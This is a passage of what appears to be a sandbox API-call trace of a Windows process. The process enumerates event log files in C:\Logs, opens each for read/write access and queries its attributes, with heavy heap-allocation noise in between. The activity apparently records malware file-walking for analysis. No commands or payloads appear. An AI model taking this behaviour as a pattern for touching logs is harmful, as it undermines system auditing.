InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.977] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0086.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.978] AreFileApisANSI () returned 1 [0086.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0086.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.979] AreFileApisANSI () returned 1 [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0086.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 51 [0086.979] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.979] GetFileType (hFile=0x424) returned 0x1 [0086.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0086.979] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.979] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.979] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.979] CloseHandle (hObject=0x424) returned 1 [0086.980] AreFileApisANSI () returned 1 [0086.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45e88 [0086.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 51 [0086.980] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.980] GetFileType (hFile=0x424) returned 0x1 [0086.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0086.980] CloseHandle (hObject=0x424) returned 1 [0086.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0086.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0086.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.981] AreFileApisANSI () returned 1 [0086.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46898 [0086.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46898, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 51 [0086.981] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.981] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69080 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0086.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0086.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69080 | out: hHeap=0x20000) returned 1 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0086.982] AreFileApisANSI () returned 1 [0086.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", lpUsedDefaultChar=0x0) returned 42 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0086.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0086.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0086.983] AreFileApisANSI () returned 1 [0086.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0086.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67a20 [0086.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=42 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 42 [0086.983] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.983] GetFileType (hFile=0x424) returned 0x1 [0086.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0086.983] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.983] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.983] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.984] CloseHandle (hObject=0x424) returned 1 [0086.984] AreFileApisANSI () returned 1 [0086.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0086.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x66ee0 [0086.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x66ee0, cchWideChar=42 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 42 [0086.984] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.984] GetFileType (hFile=0x424) returned 0x1 [0086.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66ee0 | out: hHeap=0x20000) returned 1 [0086.984] CloseHandle (hObject=0x424) returned 1 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0086.985] AreFileApisANSI () returned 1 [0086.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0086.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x670c0 [0086.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x670c0, cchWideChar=42 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 42 [0086.985] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x670c0 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.985] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, 